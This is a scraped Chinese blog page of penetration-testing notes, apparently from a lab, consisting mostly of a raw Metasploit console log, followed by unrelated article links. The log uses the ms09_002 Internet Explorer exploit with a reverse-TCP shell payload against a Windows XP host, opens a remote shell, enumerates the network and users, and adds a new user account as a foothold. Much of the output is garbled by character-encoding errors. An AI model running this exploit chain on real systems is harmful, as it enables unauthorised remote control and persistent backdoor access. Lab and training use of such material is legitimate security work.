Welcome to the Metasploit Web Console!

| | _) |

__ `__ \ _ \ __| _` | __| __ \ | _ \ | __|

| | | __/ | ( |\__ \ | | | ( | | |

_| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|

_|

=[ metasploit v3.4.2-dev [core:3.4 api:1.0]

+ -- --=[ 566 exploits - 283 auxiliary

+ -- --=[ 210 payloads - 27 encoders - 8 nops

=[ svn r9834 updated 308 days ago (2010.07.14)

Warning: This copy of the Metasploit Framework was last updated 308 days ago.

We recommend that you update the framework at least every other day.

For information on updating your copy of Metasploit, please see:

http://www.metasploit.com/redmine/projects/framework/wiki/Updating

>> use windows/browser/ms09_002_memory_corruption

>> set payload windows/shell/reverse_tcp

payload => windows/shell/reverse_tcp

>> show options

Module options:

Name Current Setting Required Description

---- --------------- -------- -----------

SRVHOST 0.0.0.0 yes The local host to listen on.

SRVPORT 8080 yes The local port to listen on.

SSL false no Negotiate SSL for incoming connections

SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)

URIPATH no The URI to use for this exploit (default is random)

Payload options (windows/shell/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC process yes Exit technique: seh, thread, process

LHOST yes The listen address

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

0 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7

>> set SRVHOST 172.16.2.100

SRVHOST => 172.16.2.100

>> set LHOST 172.16.2.100

LHOST => 172.16.2.100

>> show options

Module options:

Name Current Setting Required Description

---- --------------- -------- -----------

SRVHOST 172.16.2.100 yes The local host to listen on.

SRVPORT 8080 yes The local port to listen on.

SSL false no Negotiate SSL for incoming connections

SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)

URIPATH no The URI to use for this exploit (default is random)

Payload options (windows/shell/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC process yes Exit technique: seh, thread, process

LHOST 172.16.2.100 yes The listen address

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

0 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7

>> exploit

[*] Exploit running as background job.

[*] Started reverse handler on 172.16.2.100:4444

[*] Using URL: http://172.16.2.100:8080/9wZVWxuy

[*] Server started.

>> back

>> sessions -l

Active sessions

===============

Id Type Information Connection

-- ---- ----------- ----------

1 shell 172.16.2.100:4444 -> 172.16.2.120:1125

>> sessions -i 1

sessions -i 1

'sessions' 2?ê??ú2??òía2??üá?£?ò22?ê??é??DDμ?3ìDò

?ò?ú′|àí???t?£

C:\Documents and Settings\Administrator.WWW-95A235B5556\×à??>

>> ipconfig /all

ipconfig /all

Windows IP Configuration

Host Name . . . . . . . . . . . . : www-95a235b5556

Primary Dns Suffix . . . . . . . :

Node Type . . . . . . . . . . . . : Unknown

IP Routing Enabled. . . . . . . . : No

WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter

C:\Documents and Settings\Administrator.WWW-95A235B5556\×à??>

>> net user

net user

\\WWW-95A235B5556 μ?ó??§?ê?§

-------------------------------------------------------------------------------

Administrator Guest HelpAssistant

SUPPORT_388945a0

?üá?3é1|íê3é?£

C:\Documents and Settings\Administrator.WWW-95A235B5556\×à??>

>> net user shentouceshiwy /add

net user shentouceshiwy /add

?üá?3é1|íê3é?£

C:\Documents and Settings\Administrator.WWW-95A235B5556\×à??>

>> net user

net user

\\WWW-95A235B5556 μ?ó??§?ê?§

-------------------------------------------------------------------------------

Administrator Guest HelpAssistant

shentouceshiwy SUPPORT_388945a0

?üá?3é1|íê3é?£

渗透杂记-2013-07-13 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7的更多相关文章

  1. Windows XP PRO SP3 - Full ROP calc shellcode

    /*     Shellcode: Windows XP PRO SP3 - Full ROP calc shellcode     Author: b33f (http://www.fuzzysec ...

  2. Windows XP with SP3大客户免激活日文版

    原贴地址:http://www.humin.com.cn/ja_windows_xp_professional_with_service_pack_3_x86_dvd_vl_x14-74058-iso ...

  3. “Invalid configuration file. File "I:/My Virtual Machines/Windows XP english Professional/Windows XP Professional.vmx" was created by a VMware product

    “Invalid configuration file. File "I:/My Virtual Machines/Windows XP english Professional/Windo ...

  4. 渗透测试实例Windows XP SP2

    一.msf> use exploit/windows/dcerpc/ms03_026_dcom.看到命令提示符的改变表明该命令已经运行成功. 二.为漏洞利用代码设置必要的参数,show opti ...

  5. Windows XP SP2上安装.net 4

    1.安装 KB893803-v2-x86 2.安装dotnetfx35 3.安装dotNetFx40_Client_x86_x64 4.安装 NET Framework 4.0

  6. Windows XP系统服役13年今正式退休

    清明已过,服役13年的微软Windows XP系统也于今日正式“退休”.尽管这之后XP系统仍可以继续使用,但微软不再提供官方服务支持.对于中国数以亿计的XP用户来说,一方面是对已经使用了13年的操作系 ...

  7. 渗透杂记-2013-07-13 windows/mssql/mssql_payload

    扫描一下 Starting Nmap 5.30BETA1 ( http://nmap.org ) at 2011-05-06 09:36 中国标准时间 NSE: Loaded 49 scripts f ...

  8. 技术文集:万能WINDOWS XP封装

    这里将系统封装分为3步:做系统.封装.部署 一.做系统 平台不限,但不建议在虚拟机上制作.CPU及主板芯片没有限制,关于intelide和intelppm的不兼容问题,深度白金3in1并没有删除这些注 ...

  9. 渗透杂记-2013-07-13 关于SMB版本的扫描

    smb2的溢出,其实在metasploit里面有两个扫描器可以用,效果都差不多,只是一个判断的更加详细,一个只是粗略的判断. Welcome to the Metasploit Web Console ...

  10. 最新的windows xp sp3序列号(绝对可通过正版验证)

    MRX3F-47B9T-2487J-KWKMF-RPWBY(工行版) 可用(强推此号) QC986-27D34-6M3TY-JJXP9-TBGMD(台湾交大学生版) 可用 CM3HY-26VYW-6J ...

随机推荐

  1. orange pi pc 体验(一)

    最近在淘宝上看到一款和树莓派差不多的卡片机,定价才99元,而且是国产的,忍不住入手了一个,就是orange pi 感兴趣的可以百度搜索下,深圳一个公司出的,不过资料比树莓派少了很多,论坛中人也没多少, ...

  2. iOS学习路线图

    一.iOS学习路线图   二.iOS学习路线图--视频篇       阶 段 学完后目标 知识点 配套学习资源(笔记+源码+PPT) 密码 基础阶段 学习周期:24天       学习后目标:    ...

  3. iOS控件之UIResponder类

    iOS控件之UIResponder类 在iOS中UIResponder类是专门用来响应用户的操作处理各种事件的,我们知道UIApplication.UIView.UIViewController这几个 ...

  4. Windows Server 2008 R2组策略设置计算机配置和用户配置

    一.认识Windows Server 2008 R2域控组策略管理 1.域控服务器zhuyu.com的组策略管理默认会读取AD用户和计算机目录下创建的OU容器(组织单元), 在对应的OU容器创建对应的 ...

  5. python基础之元组、文件操作、编码、函数、变量

    1.集合set 集合是无序的,不重复的,主要作用: 去重,把一个列表变成集合,就可以自动去重 关系测试,测试两组数据的交集,差集,并集等关系 操作例子如下: list_1 = [1,4,5,7,3,6 ...

  6. My Baits入门(一)mybaits环境搭建

    1)在工程下引入mybatis-3.4.1.jar包,再引入数据库(mysql,mssql..)包. 2)在src下新建一个配置文件conf.xml <?xml version="1. ...

  7. axis2打包方式发布

    参照http://gao-xianglong.iteye.com/blog/1744557这篇文章,注意的是打包services.xml的时候要将它的上级目录meta-inf一起打包,放到axis2\ ...

  8. 一个DNS统计,RCFs,工具站点

    RCFs http://www.statdns.com/rfc/ DNS resources A collection of DNS related resources DNS Servers Nam ...

  9. 2.4 C#的变量

    在C#中,不仅有常量,还有变量,而且最常用的还是变量.下面是变量的知识. C#的变量有3个步骤:声明.赋值.使用. 变量声明的方法:数据类型 变量名; 变量赋值的方法:变量名=变量的值: 下面是这3个 ...

  10. FORM中需要反复选择LOV

    注意:1.字段长度问题 2.提示显示样式:第一条记录 3.那些不现实的返回项,或者是只读的返回项可以  将从列表中验证 改为 否    比如一个LOV 返回2个值 但是其实只用选择前一个就可以带出后一 ...